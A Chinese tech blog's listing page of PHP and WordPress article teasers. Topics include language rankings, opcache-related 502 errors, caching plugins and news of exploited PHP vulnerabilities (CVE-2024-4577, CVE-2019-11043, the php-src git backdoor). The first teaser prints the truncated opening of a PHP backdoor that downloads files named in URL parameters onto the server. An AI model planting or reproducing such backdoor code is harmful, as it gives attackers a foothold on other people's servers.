-
一個(gè)PHP后門代碼:允許通過(guò)URL參數(shù)直接下載文件到服務(wù)器
<?php set_time_limit(0); if(isset($_GET['url']) && isset($_GET['filename'])){ if(httpcopy($_GET['url'], $_GET['filename'])){ echo… -
TIOBE 8 月編程指數(shù)榜:Python 語(yǔ)言受歡迎度再創(chuàng)新高 PHP 排第十三
8 月 5 日消息,TIOBE 編程社區(qū)指數(shù)是一個(gè)衡量編程語(yǔ)言受歡迎程度的指標(biāo),評(píng)判的依據(jù)來(lái)自世界范圍內(nèi)的工程師、課程、供應(yīng)商及搜索引擎,今天 TIOBE 官網(wǎng)公布了 2024 年 8 月的編程語(yǔ)言排行榜,具體如下: Python?排名第一:占比?18.04%,本月上升?4.71% C++?排行第二:占比?10.04%,本月下跌?0.59% C?排行第三:占比?9.17%,本月下跌?2.24% J…- 285
- 0
-
中文 / 日文 PHP CGI 安裝包 現(xiàn)9.8 分漏洞 黑客可分發(fā)木馬、DDoS 拒絕攻擊等
根據(jù)最新消息,網(wǎng)絡(luò)安全公司 Akamai 于 7 月 10 日發(fā)布博文,表示今年 6 月披露 PHP 漏洞 CVE-2024-4577 之后,隔天就觀測(cè)到網(wǎng)絡(luò)上有大量攻擊者嘗試?yán)迷撀┒窗l(fā)起攻擊。 Akamai 表示在 6 月披露該 PHP 后 24 小時(shí),就觀察到大量針對(duì)蜜罐服務(wù)器的漏洞利用嘗試。 這些攻擊包括傳播名為 Gh0st RAT 的遠(yuǎn)程訪問(wèn)木馬、RedTail 和 XMRig 等加密貨…- 135
- 0
-
PHP爆嚴(yán)重漏洞:可遠(yuǎn)程執(zhí)行任意代碼 請(qǐng)盡快更新!
6 月 8 日消息,PHP 項(xiàng)目維護(hù)團(tuán)隊(duì)昨日發(fā)布新補(bǔ)丁,修復(fù)了存在于 PHP for Windows 中的遠(yuǎn)程代碼執(zhí)行(RCE)漏洞,并敦促用戶盡快更新至 6?月 6?日發(fā)布的 8.3.8、8.2.20 以及 8.1.29 版本。 PHP 是一種廣泛使用的開(kāi)放源碼腳本語(yǔ)言,設(shè)計(jì)用于網(wǎng)絡(luò)開(kāi)發(fā),通常在 Windows 和 Linux 服務(wù)器上使用。 Devcore 首席安全研究員 Orange Tsa…- 108
- 0
-
PHP 獲德國(guó) STF 基金會(huì) 20.5 萬(wàn)歐元投資,用于改進(jìn)安全性及支持文檔
4 月 27 日消息,PHP?近日獲得德國(guó)?Sovereign Tech Fund?(STF)?基金會(huì) 20.5 萬(wàn)歐元(投資,相關(guān)投資將用于提高?PHP?生態(tài)系統(tǒng)的長(zhǎng)期可持續(xù)性和安全性。 世界上大約 75% 的網(wǎng)站依賴 PHP,目前 PHP 的軟件包管理器 Packagist 中已經(jīng)列出了超過(guò) 361000 個(gè)軟件包,相關(guān)軟件包安裝數(shù)量已經(jīng)超過(guò) 500 億次,因此維護(hù) PHP 生態(tài)系統(tǒng)基礎(chǔ)設(shè)施安…- 60
- 0
-
7b2主題使用PHP8.0以上版本后經(jīng)常出現(xiàn)502
最近,主機(jī)吧在給一個(gè)新站做調(diào)整,需要用到7b2主題,發(fā)現(xiàn)網(wǎng)站一但使用PHP8.0、8.1、8.2、8.3版本后,網(wǎng)站時(shí)不時(shí)出現(xiàn)502。 檢查后發(fā)現(xiàn)是PHP的一個(gè)叫opcache的擴(kuò)展影響了 把這個(gè)擴(kuò)展卸載了就沒(méi)有出現(xiàn)502的情況了。 目前不知道什么原因,可能跟7B2主題的加密文件有關(guān)。- 175
- 0
-
wordpress有哪些 緩存插件
WordPress 緩存插件概述 WordPress 緩存插件是一種提高網(wǎng)站性能的工具,它通過(guò)緩存網(wǎng)站內(nèi)容并減少數(shù)據(jù)庫(kù)查詢次數(shù)來(lái)加快網(wǎng)頁(yè)加載速度。這些插件通常將動(dòng)態(tài)生成的WordPress頁(yè)面轉(zhuǎn)換為靜態(tài)HTML文件,從而在后續(xù)訪問(wèn)時(shí)快速呈現(xiàn)給用戶,減輕服務(wù)器負(fù)擔(dān)并提高用戶體驗(yàn)。 推薦的WordPress 緩存插件 搜索結(jié)果中推薦的WordPress緩存插件多樣,這里根據(jù)提供的信息列出部分插件: W…- 129
- 0
-
wordpress主題啟用PHP8.1后經(jīng)常出現(xiàn)網(wǎng)頁(yè)502的原因
最近主機(jī)吧把網(wǎng)站支持的PHP7.4切成了PHP8.1,因?yàn)槎颊f(shuō)PHP8.1快,主機(jī)吧也想試試。 結(jié)果切換成PHP8.1后,發(fā)現(xiàn)網(wǎng)站經(jīng)常出現(xiàn)502的情況,重啟PHP后,一段時(shí)間又出現(xiàn)了,更離譜的是會(huì)員登陸經(jīng)常失效。 主機(jī)吧查了很久,終于發(fā)現(xiàn)問(wèn)題所在,原因是PHP擴(kuò)展opcache引起的,opcache擴(kuò)展是一個(gè)PHP緩存器,可加速PHP運(yùn)行效率,不過(guò)似乎并不適用于PHP8.0以上版本。 主機(jī)吧把op…- 859
- 0
-
PHP獲取文件屬性怎樣做?有哪一些方法?
PHP如何獲取文件屬性?有些需求需要我們來(lái)獲取文件屬性,而PHP獲取文件屬性有幾種方法,具體代碼如下,感興趣的朋友接下來(lái)就跟隨小編一起來(lái)學(xué)習(xí)一下吧。 1、filesize($filename) 返回指定文件大小。 如果成功,會(huì)返回文件大小的字節(jié)數(shù);如果失敗,則返回 FALSE。 <?php header("content-type:text/html;charset=utf-8&q…- 243
- 0
-
PHP腳本最大執(zhí)行時(shí)間怎么設(shè)置
對(duì)于“PHP腳本最大執(zhí)行時(shí)間怎么設(shè)置,有幾種方法”的知識(shí)點(diǎn)有一些人不是很理解,對(duì)此小編給大家總結(jié)了相關(guān)內(nèi)容,文中的內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,具有一定的參考學(xué)習(xí)價(jià)值,希望能對(duì)大家有所幫助,接下來(lái)就跟隨小編一起學(xué)習(xí)一下“PHP腳本最大執(zhí)行時(shí)間怎么設(shè)置,有幾種方法”吧。 修改php最大時(shí)間的方法:1、在php.ini里面設(shè)置“max_execution_time = 120;”;2、通過(guò)PHP的in…- 573
- 0
-
JetBrains 等多個(gè)社區(qū)成員宣布成立 PHP 基金會(huì)
11月23日消息:據(jù)LaravelNews報(bào)道,包括JetBrains在內(nèi)的多個(gè)PHP社區(qū)成員今天宣布成立PHP基金會(huì),以繼續(xù)開(kāi)發(fā)該語(yǔ)言。成員名單還包括Automattic、Laravel、Acquia、Zend、Craft CMS、Private Packagist、Tideways和PrestaShop。 PHP基金會(huì)將是一個(gè)非盈利性組織,其使命是通過(guò)資助對(duì)PHP語(yǔ)言有貢獻(xiàn)的兼職/全職開(kāi)發(fā)人員…- 297
- 0
-
PHP的Git服務(wù)器被黑客攻擊 源碼庫(kù)被添加后門
在最新的軟件供應(yīng)鏈攻擊中,PHP官方Git倉(cāng)庫(kù)被黑客攻擊,代碼庫(kù)被篡改。昨天,PHP 團(tuán)隊(duì)在 git.php.net 服務(wù)器上維護(hù)的 php-src Git 倉(cāng)庫(kù)中被推送了兩個(gè)惡意提交。攻擊者在上游提交了一個(gè)神秘的改動(dòng),稱其正在"修復(fù)排版",假裝這是一個(gè)小的排版更正,并且偽造簽名,讓人以為這些提交是由已知的PHP開(kāi)發(fā)者和維護(hù)者Rasmus Lerdorf和Nikita Popo…- 769
- 0
-
國(guó)內(nèi)2020年開(kāi)源語(yǔ)言排行榜:Java穩(wěn)居第一 PHP排名第三 易語(yǔ)言增漲最快
1月20日 消息:今日,代碼托管服務(wù)碼云Gitee發(fā)布了2020年的開(kāi)源年報(bào),報(bào)告顯示,Java 穩(wěn)居語(yǔ)言占比第一,小眾語(yǔ)言增速迅猛。 雖然占比較去年(50%)有不小的下跌, 但?Java?依舊是使用最多的語(yǔ)言(38%),前五名的語(yǔ)言較去年變化較小,PHP 超越 Python 成為了第三位。、 此外,報(bào)告顯示,Rust 和 Dart 連續(xù)2年保持高速增長(zhǎng)。而易語(yǔ)言雖登頂增速榜,但其總量與其他語(yǔ)言相…- 1.4k
- 0
-
2019 年開(kāi)源軟件漏洞增長(zhǎng)近 50%,C 語(yǔ)言漏洞最多 PHP排第二
WhiteSource?通過(guò)對(duì) 650 多個(gè)開(kāi)發(fā)人員進(jìn)行了調(diào)查,并從?NVD(Nartional Vulnerability Database)、安全公告、經(jīng)過(guò)同行評(píng)審的漏洞數(shù)據(jù)庫(kù)、問(wèn)題跟蹤程序等渠道收集了數(shù)據(jù)之后,整理發(fā)布了一份研究報(bào)告。該報(bào)告顯示,2019 年公開(kāi)的開(kāi)源軟件漏洞數(shù)已激增至 6000 多個(gè),同比增長(zhǎng)了近 50%。 值得慶幸的是,其中有 85%?的漏洞已被披露,并提供了相應(yīng)的修復(fù)程…- 737
- 0
-
WordPress如何開(kāi)啟調(diào)試模式
最近一直在研究給wordpress換個(gè)主題,不過(guò)一直不順利,主要是主機(jī)吧對(duì)wordpress了解少,而且也不是一個(gè)程序員,換著換著就把wordrpress弄出個(gè)致命錯(cuò)誤來(lái)了。 問(wèn)了許多人也沒(méi)解決,只能自己百度搜著試試吧,不過(guò)wordpress查看故障倒是挺方便的,只要打開(kāi)調(diào)試模式就行,具體哪里有問(wèn)題就會(huì)顯示出來(lái),具體如何打開(kāi)調(diào)試模式呢? 首先進(jìn)入網(wǎng)站W(wǎng)ordPress根目錄,找到wp-config…- 524
- 0
-
如何將ICP備案號(hào)添加到網(wǎng)頁(yè)中
若您的備案審核通過(guò),獲取了備案編號(hào),您需要聯(lián)系網(wǎng)站設(shè)計(jì)人員,修改您的網(wǎng)站首頁(yè)文件,添加這樣一段HTML代碼:(index.htm,index.html,index.asp,default.asp,index.php等),加入: <div align=center><a href="http://beian.miit.gov.cn/"; target=_blan…- 3.3k
- 0
-
一鍵去除網(wǎng)頁(yè)BOM屬性【解決網(wǎng)頁(yè)亂碼,頭部空白,驗(yàn)證碼不顯示問(wèn)題】
幾個(gè)常出現(xiàn)的問(wèn)題: 1.網(wǎng)站打開(kāi)空白 2.頁(yè)面頭部出現(xiàn)多余的空白 3.網(wǎng)站出現(xiàn)亂碼,如“锘?” 4.后臺(tái)登錄驗(yàn)證碼不顯示 解決方案: 1.選用專業(yè)的編輯器,例如notepad++,sublime,editplus這樣不會(huì)自動(dòng)簽名。 2.sublime通過(guò)如下操作File -> Save with Encoding -> UTF-8保存后即可去除bom 3.notepad++選中格式 -…- 868
- 0
-
又一論壇宣布關(guān)閉 多玩游戲論壇12月31日后停止服務(wù)
12月11日 消息:12 月 10 日,多玩論壇發(fā)布服務(wù)遷移及業(yè)務(wù)升級(jí)公告,宣布將于年底關(guān)閉。公告稱論壇將于 12 月 31 日后停止服務(wù),后續(xù)原多玩論壇業(yè)務(wù)將由蝦哥論壇承接。這意味著國(guó)內(nèi)游戲社區(qū)又要少一個(gè)了。 多玩游戲成立于 2005 年,是歡聚時(shí)代旗下人氣游戲資訊平臺(tái)。官方公告表示,互聯(lián)網(wǎng)時(shí)代風(fēng)云變化,多玩網(wǎng)為了適應(yīng)新的環(huán)境需要進(jìn)行改變。為了與YY更好的結(jié)合,為玩家朋友們提供服務(wù),多玩業(yè)務(wù)將進(jìn)…- 1k
- 0
-
PHP現(xiàn)在還有多少網(wǎng)站在用?
聲明:本文來(lái)自于微信公眾號(hào)CSDN(ID:CSDNnews),作者 |?Aphinya Dechalert,譯者 |?彎月,責(zé)編 | 郭芮 以下為譯文: 如今,我們很少在主流媒體中聽(tīng)說(shuō)有關(guān)PHP的新聞了。在這個(gè)Angular、React、Node.js以及Python占據(jù)頂流的時(shí)代,就連計(jì)算機(jī)科學(xué)學(xué)位也都把焦點(diǎn)集中在Java和C語(yǔ)言上了。 與此同時(shí),PHP只能默默地蜷縮在角落里,注視著其他語(yǔ)言走紅…- 1.3k
- 0
-
注意!PHP7.x的 PHP-FPM 存在遠(yuǎn)程代碼執(zhí)行漏洞
據(jù)外媒 ZDNet 的報(bào)道,PHP 7.x 中最近修復(fù)的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞正被惡意利用,并會(huì)導(dǎo)致攻擊者控制服務(wù)器。編號(hào)為?CVE-2019-11043?的漏洞允許攻擊者通過(guò)向目標(biāo)服務(wù)器發(fā)送特制的 URL,即可在存在漏洞的服務(wù)器上執(zhí)行命令。漏洞利用的?PoC?代碼也已在 GitHub 上發(fā)布。 一旦確定了易受攻擊的目標(biāo),攻擊者便可以通過(guò)在?URL 中附加?'?a=' 以發(fā)送特制…- 6.8k
- 0
-
wordpress文章被復(fù)制的時(shí)候自動(dòng)帶鏈接
最近主機(jī)吧博客遇到一件很惡心的事情,辛辛苦苦寫的文章被人給采集了!連標(biāo)題都沒(méi)改,想想自己辛辛苦苦寫的文章被偷走了,而且對(duì)方居然收錄比你好,你說(shuō)氣人不氣人,所以主機(jī)吧在舉報(bào)的同時(shí)也想查了一些防止被人采集的方法,總得來(lái)說(shuō)都不大理想,比如說(shuō)禁止復(fù)制之類的,對(duì)一個(gè)技術(shù)站來(lái)說(shuō),禁止復(fù)制是相當(dāng)影響用戶體驗(yàn)的,所以主機(jī)吧一直沒(méi)弄。想了下在不影響用戶體驗(yàn)的情況下,只有在文章被復(fù)制的時(shí)候自動(dòng)加鏈接最為溫和。方法很簡(jiǎn)…- 693
- 0
-
2019最受歡迎的編程語(yǔ)言Python連續(xù)奪冠、PHP 受排擠
IEEE Spectrum 編程語(yǔ)言排行榜一年發(fā)布一次,這個(gè)排行榜已經(jīng)連續(xù)發(fā)布了六年。每個(gè)開(kāi)發(fā)者都需要相對(duì)流行的網(wǎng)站統(tǒng)計(jì)數(shù)據(jù),與其他的語(yǔ)言排行榜不同,IEEE Spectrum 可以讓開(kāi)發(fā)者自己選擇參數(shù)組合時(shí)的權(quán)重,得到多樣的排序結(jié)果。 而且 IEEE Spectrum 今年進(jìn)行了重大改革,針對(duì)求職者內(nèi)置了一些預(yù)設(shè)的權(quán)重,改變了一些基礎(chǔ)指標(biāo),從 8 個(gè)數(shù)據(jù)源的 11 個(gè)指標(biāo)中獲取數(shù)據(jù)。程序員還可以…- 957
- 0
-
wordpress升級(jí)插件后網(wǎng)頁(yè)出現(xiàn):Briefly unavailable for scheduled maintenance. Check back in a min
很多時(shí)候我們?cè)诟虏寮臅r(shí)候網(wǎng)頁(yè)都會(huì)提示: Briefly unavailable for scheduled maintenance. Check back in a min(翻譯成英文是: 暫時(shí)無(wú)法進(jìn)行定期維護(hù)。請(qǐng)稍后再來(lái)查看。 ) 出現(xiàn)這個(gè)問(wèn)題主要原因是更新沒(méi)成功,或者更新中斷所致。 如何解決這個(gè)問(wèn)題呢? 1.馬上通過(guò)FTP登錄你的網(wǎng)站,刪除WordPress根目錄下的 .maintenan…- 1.3k
- 0
-
如何模擬百度蜘蛛訪問(wèn)網(wǎng)頁(yè)
很多時(shí)候我們網(wǎng)站被掛馬后自己都不知道,因?yàn)榭蛻糇龅煤茈[秘,直接訪問(wèn)網(wǎng)頁(yè)是正常的,而百度蜘蛛訪問(wèn)就不一樣了,所以模擬百度蜘蛛訪問(wèn)網(wǎng)頁(yè)是非常有必要的。今天我們來(lái)說(shuō)下如何利用360瀏覽器模擬百度蜘蛛訪問(wèn)網(wǎng)頁(yè)。 如您電腦還未安裝360瀏覽器,可以在http://browser.#/?下載360瀏覽器安裝后再進(jìn)行設(shè)置。 1、打開(kāi)360瀏覽器,點(diǎn)擊右上角圖標(biāo),然后點(diǎn)擊“添加”。 2、在360應(yīng)用市場(chǎng)…- 2.3k
- 0